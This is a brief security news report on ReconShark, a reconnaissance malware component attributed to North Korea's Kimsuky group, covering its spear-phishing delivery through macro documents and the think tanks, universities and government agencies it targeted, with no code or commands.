Kimsuky, a North Korean state-sponsored APT group, has deployed a new malware component called ReconShark, according to security researchers at SentinelOne. This malware is being distributed via targeted spear-phishing emails containing OneDrive links that download documents and activate malicious macros. 

The Microsoft Office macro, triggered when the document closes, performs a more advanced version of the reconnaissance function found in Kimsuky's BabyShark malware, which stores data in string variables that it sends to a C2 (command and control) server via an HTTP POST request. ReconShark can also use the processes of the detection mechanism found on infected machines to install additional payloads, such as scripts or DLL files. Organisations and individuals in at least the USA, Europe and Asia, including think tanks, research universities and government agencies, were targeted in the campaign.